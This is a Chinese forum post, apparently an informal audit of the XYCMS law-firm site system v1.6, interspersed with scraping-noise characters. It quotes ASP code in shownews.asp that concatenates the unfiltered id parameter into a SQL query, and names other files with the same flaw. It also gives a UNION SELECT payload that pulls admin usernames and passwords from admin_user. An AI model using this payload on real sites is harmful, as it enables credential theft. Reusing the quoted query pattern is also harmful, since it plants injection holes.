前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似8 g; s% O2 x" Q+ y
2 ]- L5 I; E+ m7 F
淫荡分割线
]% X' H" c5 I0 c. w4 Q2 ?--------------------------------------------------------
" p& I$ s1 Q' k W1 b2 x
" X0 Q9 H- H, b6 `( y审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测), r: i, d7 F6 T u, G3 h
源码地址:http://down.chinaz.com/soft/29233.htm
( `. }/ m9 s$ ^& x" X% y$ u/ P
3 e+ [0 e) Z/ d# h漏洞文件:shownews.asp
2 t$ C4 F8 S: a \; D7 ~$ H8 g) c& C漏洞代码:7-13行2 y+ M9 s( a% }
8 y( Z/ Y, V, D 9 v( q# p6 f8 w6 M7 W
<% 6 o+ n3 U$ w4 j3 ]+ R' }$ [
id=request.QueryString("id")% K L) l- K5 K. s' _
7 {; v; w* E9 q
set snews=server.createobject("adodb.recordset")
1 h% a: {- U6 A9 E: {! }4 G/ L* h% b2 Texec="select * from [news] where id="&id/ Q) F! z( L0 B, ]( e& V
snews.open exec,conn,1,18 [5 a2 H& U) h5 V; W# _
%>0 ]' U$ j' C! ^
/ E$ T ?+ E x2 _: h g* N! q
* k" s8 Z; j2 T什么过滤都没有 直造成注入
4 t( ?) x' R+ x; \ 5 i4 i. ~6 d7 r2 U$ D% k
注入点:http://127.0.0.1:99/shownews.asp?id=xx7 t' z; o, Z% I) Q
$ v7 N" H0 c1 f: Z3 T
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找. f- R8 t5 L; |' @5 U" `
: E9 y0 U* X* t9 g0 f * m2 Z6 ?2 ]9 }0 X) v* w+ V
exp: union select 1,admin,password,4,5,7 from admin_user
% `( d e" b8 ]. L" I- Y
8 x! x8 d. v& l% c; S5 ~ |